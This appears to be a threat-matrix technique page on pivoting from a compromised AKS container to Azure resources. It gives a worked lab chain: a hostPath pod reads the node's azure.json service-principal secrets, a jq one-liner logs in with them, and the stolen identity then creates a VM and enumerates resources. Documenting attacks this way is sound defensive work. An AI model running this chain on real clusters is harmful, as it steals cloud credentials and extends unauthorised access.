Initial access: Using cloud credentials, Compromised images in registry, Kubeconfig file, Application vulnerability, Exposed sensitive interfaces
Execution: Exec into container, bash/cmd in container, New container, Application exploit (RCE), SSH server running inside container, Sidecar injection
Persistence: Backdoor container, Writable hostPath mount, Kubernetes CronJob, Malicious admission controller
Privilege escalation: Privileged container, Cluster-admin binding, hostPath mount, Access cloud resources, Disable Namespacing
Defense evasion: Clear container logs, Delete K8s events, Pod / container name similarity, Connect from proxy server
Credential access: List K8s secrets, Mount service principal, Access container service account, Applications credentials in configuration files, Access managed identity credentials, Malicious admission controller
Discovery: Access the K8s API server, Access Kubelet API, Network mapping, Access Kubernetes dashboard, Instance metadata API
Lateral movement: Access cloud resources, Container service account, Cluster internal networking, Applications credentials in configuration files, Writable volume mounts on the host, CoreDNS poisoning, ARP poisoning and IP spoofing
Collection: Images from a private repository
Impact: Data destruction, Resource hijacking, Denial of service

Access cloud resources

If the Kubernetes cluster is deployed in the cloud, attackers can in some cases leverage their access to a single container to reach cloud resources outside the cluster. For example, in AKS each node holds a service principal credential stored in /etc/kubernetes/azure.json. AKS uses this service principal to create and manage the Azure resources needed for cluster operation.
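
Which service principal a given cluster runs with can be read from the cluster object itself. A minimal check, assuming the resource group and cluster name used in the example below (clusters using a managed identity return "msi" instead of a client ID):

$ az aks show --resource-group test --name myAKSCluster \
--query servicePrincipalProfile.clientId -o tsv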

By default, the service principal has Contributor permissions on the cluster’s resource group. Attackers who get access to this service principal file (via a hostPath mount, for example) can use its credentials to access or modify cloud resources.
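
Whether that default scope still applies to a particular service principal can be verified with a role assignment query. A sketch, where <appId> stands for the aadClientId found in azure.json:

$ az role assignment list --assignee <appId> --all --output table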

Example

The following is an example of how to break out of the context of a Kubernetes cluster running in Azure Kubernetes Service (AKS) to gain access to a broader range of resources in Azure. For this we leverage a hostPath mount (see “Writable hostPath mount” for details).

In the Azure Cloud Shell we create a new service principal.

$ az ad sp create-for-rbac --name myAKSClusterServicePrincipal
The output includes credentials that you must protect. Be sure that you do not include these credentials in your code or check the credentials into your source control. For more information, see https://aka.ms/azadsp-cli

{
  "appId": "a89f4db3-...",
  "displayName": "myAKSClusterServicePrincipal",
  "password": "[REDACTED]",
  "tenant": "[REDACTED]"
}

Assign the Contributor role to the service principal. This is often done in practice, but it is not necessary for normal operation (and if it is granted, it should at least be limited to a narrower scope).

$ az role assignment create --assignee a89f4db3-e832-4f74-8188-3af923e96b08 --role Contributor

Now we create a new AKS cluster (in our case, test is an already existing resource group; the values for --service-principal and --client-secret need to be replaced with the appId and password from the output above).

$ az aks create \
--resource-group test \
--name myAKSCluster \
--service-principal <appId> \
--client-secret <password>

Once the cluster setup has completed, we get a kubeconfig for our new cluster.

$ az aks get-credentials --resource-group test --name myAKSCluster

The next step is to gain access to a worker node’s local filesystem as described in “Writable hostPath mount” (a condensed sketch follows below); assume our pod is called my-pod.
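
For reference, a minimal sketch of such a pod: the manifest below is illustrative (container name, image and volume name are arbitrary choices) and mounts the node’s root filesystem at /host, which is why azure.json shows up under /host/etc/kubernetes/ in the next command.

$ kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: my-pod
spec:
  containers:
  - name: shell
    image: ubuntu
    command: ["sleep", "infinity"]
    volumeMounts:
    - name: host-root
      mountPath: /host          # node filesystem appears under /host
  volumes:
  - name: host-root
    hostPath:
      path: /                   # mount the worker node's root filesystem
EOF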

$ kubectl exec -it my-pod -- cat /host/etc/kubernetes/azure.json
{
    "cloud": "AzurePublicCloud",
    "tenantId": "[REDACTED]",
    "subscriptionId": "[REDACTED]",
    "aadClientId": "a89f4db3-...",
    "aadClientSecret": "[REDACTED]",
    ...

Next, we can use the gathered credentials to authenticate as the service principal.

$ az logout
Logout successful. Re-login to your initial Cloud Shell identity with 'az login --identity'. Login with a new identity with 'az login'.
$ az login --service-principal -u <appId> --password <password> --tenant <tenant>
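
If jq is available, reading azure.json and logging in can also be combined into a single step; a sketch reusing my-pod from above:

$ CREDS=$(kubectl exec my-pod -- cat /host/etc/kubernetes/azure.json)
$ az login --service-principal \
-u "$(echo "$CREDS" | jq -r .aadClientId)" \
--password "$(echo "$CREDS" | jq -r .aadClientSecret)" \
--tenant "$(echo "$CREDS" | jq -r .tenantId)"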

From this point on, the only limitation is the service principal’s actual permissions and role assignments. As an example, we create a new virtual machine.

$ az vm create \
--resource-group test \
--name myVM \
--image UbuntuLTS
{
  "fqdns": "",
  "id": "/subscriptions/[REDACTED]/resourceGroups/test/providers/Microsoft.Compute/virtualMachines/myVM",
  "location": "switzerlandnorth",
  "macAddress": "00-22-48-61-B2-96",
  "powerState": "VM running",
  "privateIpAddress": "10.0.0.4",
  "publicIpAddress": "20.199.177.43",
  "resourceGroup": "test",
  "zones": ""
}
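
Beyond creating resources, the same credentials allow enumerating and modifying everything the service principal is scoped to. A few quick checks, sketched with the resource group from this example:

$ az group list --output table
$ az resource list --resource-group test --output table
$ az aks list --output table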

References